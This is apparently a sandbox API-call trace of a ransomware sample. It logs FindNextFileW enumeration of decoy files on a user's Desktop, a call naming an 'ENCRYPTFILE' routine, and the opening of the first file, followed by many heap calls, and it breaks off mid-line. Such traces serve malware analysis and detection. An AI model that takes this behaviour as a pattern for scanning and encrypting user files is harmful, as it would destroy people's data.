1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd910d10, ftCreationTime.dwHighDateTime=0x1d5e636, ftLastAccessTime.dwLowDateTime=0x7aad2b30, ftLastAccessTime.dwHighDateTime=0x1d5e25e, ftLastWriteTime.dwLowDateTime=0x7aad2b30, ftLastWriteTime.dwHighDateTime=0x1d5e25e, nFileSizeHigh=0x0, nFileSizeLow=0x8473, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="9PZJqif.m4a", cAlternateFileName="")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73b60650, ftCreationTime.dwHighDateTime=0x1d5e12b, ftLastAccessTime.dwLowDateTime=0xfe4a440, ftLastAccessTime.dwHighDateTime=0x1d5e2b8, ftLastWriteTime.dwLowDateTime=0xfe4a440, ftLastWriteTime.dwHighDateTime=0x1d5e2b8, nFileSizeHigh=0x0, nFileSizeLow=0x8ef9, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="A2BeonpxV2cn0bIC.png", cAlternateFileName="A2BEON~1.PNG")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x864003a0, ftCreationTime.dwHighDateTime=0x1d5e0f1, ftLastAccessTime.dwLowDateTime=0xecc04980, ftLastAccessTime.dwHighDateTime=0x1d5e6ed, ftLastWriteTime.dwLowDateTime=0xecc04980, ftLastWriteTime.dwHighDateTime=0x1d5e6ed, nFileSizeHigh=0x0, nFileSizeLow=0x17a26, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="AQwif8E74Z.avi", cAlternateFileName="AQWIF8~1.AVI")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4eb2670, ftCreationTime.dwHighDateTime=0x1d5e8af, ftLastAccessTime.dwLowDateTime=0x7e4b67d0, ftLastAccessTime.dwHighDateTime=0x1d5f018, ftLastWriteTime.dwLowDateTime=0x7e4b67d0, ftLastWriteTime.dwHighDateTime=0x1d5f018, nFileSizeHigh=0x0, nFileSizeLow=0x97a6, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="aYyiLdyhoIdALfth0-Sh.csv", cAlternateFileName="AYYILD~1.CSV")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58249d20, ftCreationTime.dwHighDateTime=0x1d5e324, ftLastAccessTime.dwLowDateTime=0xae133060, ftLastAccessTime.dwHighDateTime=0x1d5ea64, ftLastWriteTime.dwLowDateTime=0xae133060, ftLastWriteTime.dwHighDateTime=0x1d5ea64, nFileSizeHigh=0x0, nFileSizeLow=0xbc9f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="aZ 2dgF6.ppt", cAlternateFileName="AZ2DGF~1.PPT")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe32544d0, ftCreationTime.dwHighDateTime=0x1d5e188, ftLastAccessTime.dwLowDateTime=0x95acb310, ftLastAccessTime.dwHighDateTime=0x1d5e272, ftLastWriteTime.dwLowDateTime=0x95acb310, ftLastWriteTime.dwHighDateTime=0x1d5e272, nFileSizeHigh=0x0, nFileSizeLow=0x15e76, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="BbxrQ2nHZPP_A.jpg", cAlternateFileName="BBXRQ2~1.JPG")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a228cf0, ftCreationTime.dwHighDateTime=0x1d5e716, ftLastAccessTime.dwLowDateTime=0x27856890, ftLastAccessTime.dwHighDateTime=0x1d5e7e1, ftLastWriteTime.dwLowDateTime=0x27856890, ftLastWriteTime.dwHighDateTime=0x1d5e7e1, nFileSizeHigh=0x0, nFileSizeLow=0x5c27, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="bUb qc_SLq8O.mp4", cAlternateFileName="BUBQC_~1.MP4")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b8a7ab0, ftCreationTime.dwHighDateTime=0x1d5ec1b, ftLastAccessTime.dwLowDateTime=0x90f581f0, ftLastAccessTime.dwHighDateTime=0x1d5e446, ftLastWriteTime.dwLowDateTime=0x90f581f0, ftLastWriteTime.dwHighDateTime=0x1d5e446, nFileSizeHigh=0x0, nFileSizeLow=0x156b0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="BwLCz.jpg", cAlternateFileName="")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa0537ea0, ftCreationTime.dwHighDateTime=0x1d5ea99, ftLastAccessTime.dwLowDateTime=0x2b4da1f0, ftLastAccessTime.dwHighDateTime=0x1d5ee75, ftLastWriteTime.dwLowDateTime=0x2b4da1f0, ftLastWriteTime.dwHighDateTime=0x1d5ee75, nFileSizeHigh=0x0, nFileSizeLow=0x18e62, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="CgH9zawVTY35raopEyZt.mp3", cAlternateFileName="CGH9ZA~1.MP3")) returned 1 [0118.214] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e657550, ftCreationTime.dwHighDateTime=0x1d5e6c4, ftLastAccessTime.dwLowDateTime=0x4dbb1970, ftLastAccessTime.dwHighDateTime=0x1d5e605, ftLastWriteTime.dwLowDateTime=0x4dbb1970, ftLastWriteTime.dwHighDateTime=0x1d5e605, nFileSizeHigh=0x0, nFileSizeLow=0x8f2b, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="cSg8 emhaX_r.ots", cAlternateFileName="CSG8EM~1.OTS")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1321e690, ftCreationTime.dwHighDateTime=0x1d5eccc, ftLastAccessTime.dwLowDateTime=0x4cc2b900, ftLastAccessTime.dwHighDateTime=0x1d5e6b0, ftLastWriteTime.dwLowDateTime=0x4cc2b900, ftLastWriteTime.dwHighDateTime=0x1d5e6b0, nFileSizeHigh=0x0, nFileSizeLow=0x17903, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="CtmEppS 7Ks0.swf", cAlternateFileName="CTMEPP~1.SWF")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0671400, ftCreationTime.dwHighDateTime=0x1d5ef84, ftLastAccessTime.dwLowDateTime=0x6169ec90, ftLastAccessTime.dwHighDateTime=0x1d5e98d, ftLastWriteTime.dwLowDateTime=0x6169ec90, ftLastWriteTime.dwHighDateTime=0x1d5e98d, nFileSizeHigh=0x0, nFileSizeLow=0xa86e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="f9lcZFridHfs.rtf", cAlternateFileName="F9LCZF~1.RTF")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xabf40970, ftCreationTime.dwHighDateTime=0x1d5ec9f, ftLastAccessTime.dwLowDateTime=0xc4b9db30, ftLastAccessTime.dwHighDateTime=0x1d5e432, ftLastWriteTime.dwLowDateTime=0xc4b9db30, ftLastWriteTime.dwHighDateTime=0x1d5e432, nFileSizeHigh=0x0, nFileSizeLow=0x5ad5, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="gp1QElBYzj-bWq.bmp", cAlternateFileName="GP1QEL~1.BMP")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e9bb8c0, ftCreationTime.dwHighDateTime=0x1d5f068, ftLastAccessTime.dwLowDateTime=0xfa80a9c0, ftLastAccessTime.dwHighDateTime=0x1d5eca6, ftLastWriteTime.dwLowDateTime=0xfa80a9c0, ftLastWriteTime.dwHighDateTime=0x1d5eca6, nFileSizeHigh=0x0, nFileSizeLow=0x7f8f, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="I4IMK8uPkmw_W.mp3", cAlternateFileName="I4IMK8~1.MP3")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6ceb560, ftCreationTime.dwHighDateTime=0x1d5e714, ftLastAccessTime.dwLowDateTime=0x1063a710, ftLastAccessTime.dwHighDateTime=0x1d5e941, ftLastWriteTime.dwLowDateTime=0x1063a710, ftLastWriteTime.dwHighDateTime=0x1d5e941, nFileSizeHigh=0x0, nFileSizeLow=0xd6ba, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="jHCQtc-oyo Hp07enJ.ots", cAlternateFileName="JHCQTC~1.OTS")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41629130, ftCreationTime.dwHighDateTime=0x1d5ebbe, ftLastAccessTime.dwLowDateTime=0xcb05e920, ftLastAccessTime.dwHighDateTime=0x1d5eb9e, ftLastWriteTime.dwLowDateTime=0xcb05e920, ftLastWriteTime.dwHighDateTime=0x1d5eb9e, nFileSizeHigh=0x0, nFileSizeLow=0x18980, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="kLTeW7.mp3", cAlternateFileName="")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfdf40600, ftCreationTime.dwHighDateTime=0x1d5ebdf, ftLastAccessTime.dwLowDateTime=0x31578900, ftLastAccessTime.dwHighDateTime=0x1d5e365, ftLastWriteTime.dwLowDateTime=0x31578900, ftLastWriteTime.dwHighDateTime=0x1d5e365, nFileSizeHigh=0x0, nFileSizeLow=0x4550, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="LdhR.mkv", cAlternateFileName="")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25e346f0, ftCreationTime.dwHighDateTime=0x1d5e805, ftLastAccessTime.dwLowDateTime=0xc6f1e70, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xc6f1e70, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0x17df9, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="mA8Gl8nzr8.xlsx", cAlternateFileName="MA8GL8~1.XLS")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x120f2ee0, ftCreationTime.dwHighDateTime=0x1d5e117, ftLastAccessTime.dwLowDateTime=0xd5a93410, ftLastAccessTime.dwHighDateTime=0x1d5e755, ftLastWriteTime.dwLowDateTime=0xd5a93410, ftLastWriteTime.dwHighDateTime=0x1d5e755, nFileSizeHigh=0x0, nFileSizeLow=0x6e44, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="MDF9dFhi.gif", cAlternateFileName="")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x14423090, ftCreationTime.dwHighDateTime=0x1d5e5ae, ftLastAccessTime.dwLowDateTime=0xf27c3430, ftLastAccessTime.dwHighDateTime=0x1d5e3cb, ftLastWriteTime.dwLowDateTime=0xf27c3430, ftLastWriteTime.dwHighDateTime=0x1d5e3cb, nFileSizeHigh=0x0, nFileSizeLow=0x86e3, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="OD9hoNYV uW0IIj2du.bmp", cAlternateFileName="OD9HON~1.BMP")) returned 1 [0118.216] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xba8245c0, ftCreationTime.dwHighDateTime=0x1d5f04f, ftLastAccessTime.dwLowDateTime=0x246b8b00, ftLastAccessTime.dwHighDateTime=0x1d5e497, ftLastWriteTime.dwLowDateTime=0x246b8b00, ftLastWriteTime.dwHighDateTime=0x1d5e497, nFileSizeHigh=0x0, nFileSizeLow=0xdbcb, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="oIFaH-1_nryv.mp3", cAlternateFileName="OIFAH-~1.MP3")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28dc4f60, ftCreationTime.dwHighDateTime=0x1d5ea39, ftLastAccessTime.dwLowDateTime=0xee99dd0, ftLastAccessTime.dwHighDateTime=0x1d5e81b, ftLastWriteTime.dwLowDateTime=0xee99dd0, ftLastWriteTime.dwHighDateTime=0x1d5e81b, nFileSizeHigh=0x0, nFileSizeLow=0x1449e, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="QKxk.mp3", cAlternateFileName="")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc91ac250, ftCreationTime.dwHighDateTime=0x1d5e92a, ftLastAccessTime.dwLowDateTime=0x37ffae10, ftLastAccessTime.dwHighDateTime=0x1d5e499, ftLastWriteTime.dwLowDateTime=0x37ffae10, ftLastWriteTime.dwHighDateTime=0x1d5e499, nFileSizeHigh=0x0, nFileSizeLow=0x16d36, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="Tj494Ho-BBcDUp1CA.mkv", cAlternateFileName="TJ494H~1.MKV")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x37376ed0, ftCreationTime.dwHighDateTime=0x1d5eaa9, ftLastAccessTime.dwLowDateTime=0x382ebf10, ftLastAccessTime.dwHighDateTime=0x1d5e954, ftLastWriteTime.dwLowDateTime=0x382ebf10, ftLastWriteTime.dwHighDateTime=0x1d5e954, nFileSizeHigh=0x0, nFileSizeLow=0xff62, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="tK8Qmak8ns0qz6I3UcG.wav", cAlternateFileName="TK8QMA~1.WAV")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f9f2890, ftCreationTime.dwHighDateTime=0x1d5e26a, ftLastAccessTime.dwLowDateTime=0x2521ef00, ftLastAccessTime.dwHighDateTime=0x1d5ea03, ftLastWriteTime.dwLowDateTime=0x2521ef00, ftLastWriteTime.dwHighDateTime=0x1d5ea03, nFileSizeHigh=0x0, nFileSizeLow=0x11885, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="uaY41mSq.csv", cAlternateFileName="")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1578ca90, ftCreationTime.dwHighDateTime=0x1d5f0cc, ftLastAccessTime.dwLowDateTime=0xe86e6710, ftLastAccessTime.dwHighDateTime=0x1d5e696, ftLastWriteTime.dwLowDateTime=0xe86e6710, ftLastWriteTime.dwHighDateTime=0x1d5e696, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="uI6dJwkjdmY9", cAlternateFileName="UI6DJW~1")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700cfec0, ftCreationTime.dwHighDateTime=0x1d5ef11, ftLastAccessTime.dwLowDateTime=0xb0963b40, ftLastAccessTime.dwHighDateTime=0x1d5f016, ftLastWriteTime.dwLowDateTime=0xb0963b40, ftLastWriteTime.dwHighDateTime=0x1d5f016, nFileSizeHigh=0x0, nFileSizeLow=0xa4a, dwReserved0=0x144f188, dwReserved1=0x8, cFileName="V_VfUPg6JY sjdteIA3.gif", cAlternateFileName="V_VFUP~1.GIF")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x726794b0, ftCreationTime.dwHighDateTime=0x1d5eaec, ftLastAccessTime.dwLowDateTime=0x835e97a0, ftLastAccessTime.dwHighDateTime=0x1d5f0e1, ftLastWriteTime.dwLowDateTime=0x835e97a0, ftLastWriteTime.dwHighDateTime=0x1d5f0e1, nFileSizeHigh=0x0, nFileSizeLow=0xdae9, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WMWtJGFcI6Q-91k75WQc.wav", cAlternateFileName="WMWTJG~1.WAV")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48ff38d0, ftCreationTime.dwHighDateTime=0x1d5e475, ftLastAccessTime.dwLowDateTime=0x4b71c330, ftLastAccessTime.dwHighDateTime=0x1d5f11d, ftLastWriteTime.dwLowDateTime=0x4b71c330, ftLastWriteTime.dwHighDateTime=0x1d5f11d, nFileSizeHigh=0x0, nFileSizeLow=0x7ee3, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="WrCkWcj.m4a", cAlternateFileName="")) returned 1 [0118.217] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd7bbe40, ftCreationTime.dwHighDateTime=0x1d5e379, ftLastAccessTime.dwLowDateTime=0x31cf1480, ftLastAccessTime.dwHighDateTime=0x1d5e319, ftLastWriteTime.dwLowDateTime=0x31cf1480, ftLastWriteTime.dwHighDateTime=0x1d5e319, nFileSizeHigh=0x0, nFileSizeLow=0x36a1, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="xV3SDT.ots", cAlternateFileName="")) returned 1 [0118.224] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6a20, ftCreationTime.dwHighDateTime=0x1d5e38b, ftLastAccessTime.dwLowDateTime=0x59628850, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x59628850, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3390, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="_uPhYhD.png", cAlternateFileName="")) returned 1 [0118.224] FindNextFileW (in: hFindFile=0x41ac440, lpFindFileData=0x144ec90 | out: lpFindFileData=0x144ec90*(dwFileAttributes=0x43c34c0, ftCreationTime.dwLowDateTime=0x43e2240, ftCreationTime.dwHighDateTime=0xdf0000, ftLastAccessTime.dwLowDateTime=0xdf01c4, ftLastAccessTime.dwHighDateTime=0x14, ftLastWriteTime.dwLowDateTime=0xdf0000, ftLastWriteTime.dwHighDateTime=0x20, nFileSizeHigh=0x43c3564, nFileSizeLow=0x43c34dc, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="", cAlternateFileName="難мńဓ+\x10")) returned 0 [0118.224] FindClose (in: hFindFile=0x41ac440 | out: hFindFile=0x41ac440) returned 1 [0118.224] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="|0ocQBHc.xls|1YTxNPPGwWg.wav|2V N4wBRBU.mp3|42F0.TMP.EXE.exe|5NSsZwi6b.rtf|9IrmcPpBnuYGc4Yelr9W.mp4|9PZJqif.m4a|A2BeonpxV2cn0bIC.png|AQwif8E74Z.avi|aYyiLdyhoIdALfth0-Sh.csv|aZ 2dgF6.ppt|BbxrQ2nHZPP_A.jpg|bUb qc_SLq8O.mp4|BwLCz.jpg|CgH9zawVTY35raopEyZt.mp3|cSg8 emhaX_r.ots|CtmEppS 7Ks0.swf|desktop.ini|f9lcZFridHfs.rtf|gp1QElBYzj-bWq.bmp|I4IMK8uPkmw_W.mp3|jHCQtc-oyo Hp07enJ.ots|kLTeW7.mp3|LdhR.mkv|mA8Gl8nzr8.xlsx|MDF9dFhi.gif|OD9hoNYV uW0IIj2du.bmp|oIFaH-1_nryv.mp3|QKxk.mp3|Tj494Ho-BBcDUp1CA.mkv|tK8Qmak8ns0qz6I3UcG.wav|uaY41mSq.csv|V_VfUPg6JY sjdteIA3.gif|WMWtJGFcI6Q-91k75WQc.wav|WrCkWcj.m4a|xV3SDT.ots|_uPhYhD.png", cchCount1=619, lpString2="", cchCount2=0) returned 3 [0118.224] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0118.224] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4cea130, ftCreationTime.dwHighDateTime=0x1d5e5cb, ftLastAccessTime.dwLowDateTime=0x4328c100, ftLastAccessTime.dwHighDateTime=0x1d5ef89, ftLastWriteTime.dwLowDateTime=0x4328c100, ftLastWriteTime.dwHighDateTime=0x1d5ef89, nFileSizeHigh=0x0, nFileSizeLow=0x249c, dwReserved0=0xdf0b28, dwReserved1=0x8, cFileName="0ocQBHc.xls", cAlternateFileName="")) returned 0x41ac780 [0118.225] FindClose (in: hFindFile=0x41ac780 | out: hFindFile=0x41ac780) returned 1 [0118.225] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0118.225] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0118.225] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0118.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0118.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0118.225] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\0ocQBHc.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\0ocqbhc.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea490 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0118.226] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369cc0 [0118.226] FreeLibrary (hLibModule=0x772d0000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0118.226] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0118.227] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | 